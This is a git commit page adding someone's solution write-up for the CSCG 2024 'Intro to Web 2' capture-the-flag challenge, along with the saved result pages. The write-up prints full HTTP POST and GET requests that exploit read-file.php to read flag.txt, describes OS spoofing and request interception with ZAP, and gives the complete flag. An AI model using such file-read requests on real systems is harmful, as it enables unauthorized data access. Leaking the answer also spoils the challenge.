solved intro-web-2
This commit is contained in:
BIN
cscg24/rev/intro_rev_2/rev2.bndb
Normal file
BIN
cscg24/rev/intro_rev_2/rev2.bndb
Normal file
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
File diff suppressed because it is too large
Load Diff
@@ -1,5 +1,5 @@
|
|||||||
#HSQL Database Engine 2.7.2
|
#HSQL Database Engine 2.7.2
|
||||||
#Sat Mar 02 03:32:43 CET 2024
|
#Sat Mar 02 04:14:43 CET 2024
|
||||||
tx_timestamp=543
|
tx_timestamp=61202
|
||||||
modified=yes
|
modified=no
|
||||||
version=2.7.2
|
version=2.7.2
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
19
cscg24/web/intro_web_2/leaked_sites/burn_after_reading.html
Normal file
19
cscg24/web/intro_web_2/leaked_sites/burn_after_reading.html
Normal file
@@ -0,0 +1,19 @@
|
|||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Intro to Web 2</title>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Burn After Reading</h1>
|
||||||
|
This page automatically retrieves confidential information.
|
||||||
|
To protect against unauthorized use, the backend server will irreversibly nuke all of our data in
|
||||||
|
case this page is accessed by someone that failed to pass our
|
||||||
|
<em>Military-Grade Security Gate™</em>.
|
||||||
|
<h3>Status of flag document:
|
||||||
|
<span style="color:green">INTACT</span></h3>
|
||||||
|
<hr>
|
||||||
|
<pre>
|
||||||
|
Flag part 4/4: W4at6R2B}</pre>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
16
cscg24/web/intro_web_2/leaked_sites/statistics_console.html
Normal file
16
cscg24/web/intro_web_2/leaked_sites/statistics_console.html
Normal file
@@ -0,0 +1,16 @@
|
|||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Intro to Web 2</title>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Statistics Console (POST version)</h1>
|
||||||
|
<h3>File Name:
|
||||||
|
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
|
||||||
|
<hr>
|
||||||
|
<pre>
|
||||||
|
Flag part 2/4: UaT0BVvk</pre>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
@@ -0,0 +1,16 @@
|
|||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Intro to Web 2</title>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Statistics Console (GET version)</h1>
|
||||||
|
<h3>File Name:
|
||||||
|
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
|
||||||
|
<hr>
|
||||||
|
<pre>
|
||||||
|
Flag part 3/4: Q9Z39J9A</pre>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
@@ -1,2 +1,57 @@
|
|||||||
### 1.Part
|
### 1.Part
|
||||||
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
|
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
|
||||||
|
### 2. Part
|
||||||
|
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
|
||||||
|
Sending the following request:
|
||||||
|
|
||||||
|
```http
|
||||||
|
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
|
||||||
|
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
content-length: 17
|
||||||
|
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
|
||||||
|
filename=flag.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
|
||||||
|
|
||||||
|
### 3. Part
|
||||||
|
|
||||||
|
A similar bug can be used with a GET request to get the content of the flag.txt file.
|
||||||
|
This time we use a faulty php file called read-file.php
|
||||||
|
|
||||||
|
```http
|
||||||
|
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
|
||||||
|
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
content-length: 0
|
||||||
|
```
|
||||||
|
|
||||||
|
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
|
||||||
|
|
||||||
|
### 4.Part
|
||||||
|
We now have to intercept a request made and change the authority information.
|
||||||
|
When we do this we get the fourth part of the flag.
|
||||||
|
|
||||||
|
### flag
|
||||||
|
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}
|
||||||
|
|||||||
Reference in New Issue
Block a user